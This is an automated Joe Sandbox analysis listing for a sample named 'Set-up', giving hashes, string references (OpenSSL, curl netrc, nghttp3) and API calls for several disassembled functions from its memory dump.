Opcode ID: 550abe994eea040d8004353e48ab965c8f3ff001ddacce9afb1fcb5c49f9dd44
Instruction ID: 4192353f90713dbad772ec844beacafc6e9dece71b8d9f66d5a197f8fa37f8d2
Opcode Fuzzy Hash: 550abe994eea040d8004353e48ab965c8f3ff001ddacce9afb1fcb5c49f9dd44
Instruction Fuzzy Hash: E3C13B7160C3958FC711DF28C49076ABBE1AF95314F098A9DF8D58B382D234DD05DBA2

Function 00DE2430 Relevance: 8.0, Strings: 4, Instructions: 2966COMMON

Download Yara Rule

Strings

@, xrefs: 00DE4EA7
ssl/quic/quic_txp.c, xrefs: 00DE2A29, 00DE3096, 00DE3477, 00DE357D, 00DE3FDE, 00DE4101
@, xrefs: 00DE4F5D
@, xrefs: 00DE4DB4

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: @$@$@$ssl/quic/quic_txp.c
API String ID: 0-600063881
Opcode ID: 000e32a861a9f1853819be492e46ba6b87be28786b5e091e9ead0183204b8d53
Instruction ID: 8e6150563ef534bc0e19cae8870dc95ffbff3fa9540da00b647b575faa49c625
Opcode Fuzzy Hash: 000e32a861a9f1853819be492e46ba6b87be28786b5e091e9ead0183204b8d53
Instruction Fuzzy Hash: 9353E8716083818FD724EF29C884BABB7E5FF85314F18492DE89987391D771E944CBA2

Function 00CE6210 Relevance: 7.9, Strings: 6, Instructions: 419COMMON

Download Yara Rule

Strings

password, xrefs: 00CE65C6
login, xrefs: 00CE64FF
machine, xrefs: 00CE6456, 00CE6656
default, xrefs: 00CE6471
macdef, xrefs: 00CE643B
netrc.c, xrefs: 00CE6243, 00CE6541, 00CE655C, 00CE6609, 00CE6627, 00CE66DD, 00CE66F7, 00CE670E, 00CE673F, 00CE676B

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: default$login$macdef$machine$netrc.c$password
API String ID: 0-1043775505
Opcode ID: d7ac81e54bbf878c4c4695e7679fe9427dd0138f95a9778b62b52206b8da8512
Instruction ID: f1dc5ba37134f419441bff201a829015350fbdd35543259e97a72398a2bf3218
Opcode Fuzzy Hash: d7ac81e54bbf878c4c4695e7679fe9427dd0138f95a9778b62b52206b8da8512
Instruction Fuzzy Hash: 20E136705283C19BE7119F23D885B2BBBD4AFA5788F14042CF8D557282E3B5DE48D792

Function 00FD48A0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 1070COMMON

Download Yara Rule

Strings

BQ`, xrefs: 00FD4F64

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: BQ`
API String ID: 0-1649249777
Opcode ID: 10e448924b5966f69b5ed819cca95ec5eda3f69c59e225fdedd8391064a66ace
Instruction ID: f57caac87f1e9e069c2c39f5ffe42bad6fefae3c1d6d704080d0a45284d83851
Opcode Fuzzy Hash: 10e448924b5966f69b5ed819cca95ec5eda3f69c59e225fdedd8391064a66ace
Instruction Fuzzy Hash: 80A2B171A08B169FC718CF29C490669F7E2FF88314F19866ED8A987781D334F861DB91

Function 00DF00F0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 404stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,0008000F,00000008,?,00E72212,00000000,00000000), ref: 00DF0109

Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37262
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E37285
Part of subcall function 00E37220: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372C5
Part of subcall function 00E37220: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,crypto/engine/eng_list.c,000000EB,ENGINE_get_first,00000000,00E5BD91), ref: 00E372E8

Strings

1, xrefs: 00DF0328
crypto/asn1/a_object.c, xrefs: 00DF012F, 00DF0151, 00DF039E, 00DF03B4, 00DF05C3, 00DF05FC, 00DF062C
a2d_ASN1_OBJECT, xrefs: 00DF0128, 00DF014A, 00DF05BD

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: strlen$strcpy
String ID: 1$a2d_ASN1_OBJECT$crypto/asn1/a_object.c
API String ID: 2790333442-843477118
Opcode ID: 7e6b7ef33a4c9682bda4c8d8b9536d826cd50d941d7d9df3f817e9da5296ce9e
Instruction ID: 225f70d8c7837950a45f6a90e5815cc4c3089c0f294a935eb5f281799f29ae04
Opcode Fuzzy Hash: 7e6b7ef33a4c9682bda4c8d8b9536d826cd50d941d7d9df3f817e9da5296ce9e
Instruction Fuzzy Hash: 50E13C719083099BD7219F28D84173EBBD1AF91754F0ACB2DFAC8A7253E371D94487A2

Function 00D2E070 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 436COMMON

Download Yara Rule

APIs

_assert.API-MS-WIN-CRT-RUNTIME-L1-1-0((size_t)(p - buf->last) == len,nghttp3_qpack.c,000007B9,?,?,?,?,?,?,?,00D2C1CE,?,00000003,?), ref: 00D2E4EE

Strings

nghttp3_qpack.c, xrefs: 00D2E4E4
(size_t)(p - buf->last) == len, xrefs: 00D2E4E9

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: _assert
String ID: (size_t)(p - buf->last) == len$nghttp3_qpack.c
API String ID: 1222420520-1997541155
Opcode ID: adda330264f46620689e4a10c2c0215c5af94790c4b17fea5a4ce70da31da721
Instruction ID: bbff29b8045ea85496f8b1f275ac08b444c34b93cfefc5fa0fd43c5445b3e056
Opcode Fuzzy Hash: adda330264f46620689e4a10c2c0215c5af94790c4b17fea5a4ce70da31da721
Instruction Fuzzy Hash: 80E10732B042205BD7199E2CE880729B7D7EFE5314F298A3CE9A9C73C1D635DC4987A1

Function 00EEE5D0 Relevance: 5.1, APIs: 3, Instructions: 1393COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,00000000,00000400), ref: 00EEE5F2
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EEE67F
memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EF003E

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: d560192192d425f2fe1a2247082bb7b072702ed6445928f4ee7439397c72066a
Instruction ID: 997138a687871677968ddc65f790c020d5791ec63757fc5697fa468773d61b91
Opcode Fuzzy Hash: d560192192d425f2fe1a2247082bb7b072702ed6445928f4ee7439397c72066a
Instruction Fuzzy Hash: 27D24DAAC39BD541E323A63D64122E6E750AFFB248F51E72BFCD430E52EB2175844319

Function 00FFE940 Relevance: 4.9, Strings: 3, Instructions: 1163COMMON

Download Yara Rule

Strings

4, xrefs: 00FFEA6D
`, xrefs: 00FFF8D3
`, xrefs: 00FFFE82

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: 4$`$`
API String ID: 0-1230936812
Opcode ID: 22c08b1c20045edf401854e8e41b5133f4c57ccf1e5271b70e173b36f1baf315
Instruction ID: 3cf28acf13b2205a4eec4758e929f10735dc79cd28ceff9063bf192128b00e70
Opcode Fuzzy Hash: 22c08b1c20045edf401854e8e41b5133f4c57ccf1e5271b70e173b36f1baf315
Instruction Fuzzy Hash: 42B2B072D087958FD724CF18C8806AAB7E2FFCA314F158B2DE99597366D730A905CB42

Function 00FF62D0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON

Download Yara Rule

Strings

, xrefs: 00FF6AA6
, xrefs: 00FF692B
, xrefs: 00FF69F8

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: $ $
API String ID: 0-3665324030
Opcode ID: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction ID: 2dd4d20f9ad501ed2ad1effb85b2b3411a13c3c1a6cd8603d3e92664b4468f4b
Opcode Fuzzy Hash: 44926a9952185c717709522a6c7a105de9636f1a377ff329ad924952f8b001f7
Instruction Fuzzy Hash: 426204759083958FC324CF29C48066AFBE1BFC8350F148A2EEAD993361D774A945DF92

Function 00DA24A0 Relevance: 4.1, Strings: 3, Instructions: 385COMMON

Download Yara Rule

Strings

quic hpquic kuossl_qrl_enc_level_set_key_update, xrefs: 00DA2680
ssl/quic/quic_record_shared.c, xrefs: 00DA2524, 00DA25A8, 00DA2752, 00DA27EB
ossl_qrl_enc_level_set_provide_secret, xrefs: 00DA251A, 00DA259E, 00DA2748, 00DA27E1

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID: ossl_qrl_enc_level_set_provide_secret$quic hpquic kuossl_qrl_enc_level_set_key_update$ssl/quic/quic_record_shared.c
API String ID: 0-2745174052
Opcode ID: c237eb257d72bb539e8805883338f347921f3899f2df169c6d702f05bfc348d4
Instruction ID: b776c0e7a373f278bc7c01e0afe781343f178b276df9661788d9f0ee41afb8dd
Opcode Fuzzy Hash: c237eb257d72bb539e8805883338f347921f3899f2df169c6d702f05bfc348d4
Instruction Fuzzy Hash: 7FD10875A483459BE7309B5ADC42B7BB7E5BF85704F08082CF98967282E771E904CB72

Function 00FF0560 Relevance: 3.4, APIs: 2, Instructions: 932COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ea9e0452e0729a0b042d439064abb5a501438ef734181bd65ed0bed78b28ca
Instruction ID: 746350bbdd28f6b5f5373d96ce2c66e6c83b7bc28a5542d7675aa9c627c70063
Opcode Fuzzy Hash: 85ea9e0452e0729a0b042d439064abb5a501438ef734181bd65ed0bed78b28ca
Instruction Fuzzy Hash: B7828D72A087598FC724CF28C88066AF7E1BFC4714F198A2DE99997361D770E845DF82

Function 00EEE138 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 145COMMON

Download Yara Rule

APIs

memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0(?,?,00000400), ref: 00EEE16E

Strings

providers/implementations/kdfs/argon2.c, xrefs: 00EEE315, 00EEE328

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID: memcpy
String ID: providers/implementations/kdfs/argon2.c
API String ID: 3510742995-3406374482
Opcode ID: aa9e56cc6e21382a672e0a6432a6b8ca0867922a5f789221647865a595aeb891
Instruction ID: 43b39858ae7edbe5442829f95a74447c0fddf5805c33e2accf38b43024542730
Opcode Fuzzy Hash: aa9e56cc6e21382a672e0a6432a6b8ca0867922a5f789221647865a595aeb891
Instruction Fuzzy Hash: C9515771D087049BD310EB28D84169AF3E8FF98344F549E2DE98AA7242E331FAC5C785

Function 01000940 Relevance: 2.8, Strings: 1, Instructions: 1582COMMON

Download Yara Rule

Strings

, xrefs: 010011EA

Memory Dump Source

Source File: 00000000.00000002.2253370762.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000000.00000002.2253351918.0000000000C80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.000000000115F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253727514.00000000011E8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253807365.00000000011E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253823217.00000000011EB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253837642.00000000011EC000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253858141.00000000011F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.00000000011F3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253874001.000000000132E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2253975906.000000000134F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254003954.0000000001350000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2254018587.0000000001354000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c80000_Set-up.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: b98a3b23921078d086398a01b1c7b0029fe2ba029414c6c65b29767501d6dfb7
Instruction ID: be15df5bf3d6c9e371d744feac73e24fd7529cba86f29fdeb5ec84380d03a3b1
Opcode Fuzzy Hash: b98a3b23921078d086398a01b1c7b0029fe2ba029414c6c65b29767501d6dfb7
Instruction Fuzzy Hash: 0FE27931A083658BD719CF69D08056EFBE2AFC8304F198A2DE9D997395D770EC45CB82

Function 00FD4410 Relevance: 2.8, APIs: 2, Instructions: 316COMMON

Download Yara Rule

APIs

memset.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000000,?,?,?,?,?,?,00000000,?,?,00FD22FC,?,?), ref: 00FD447B
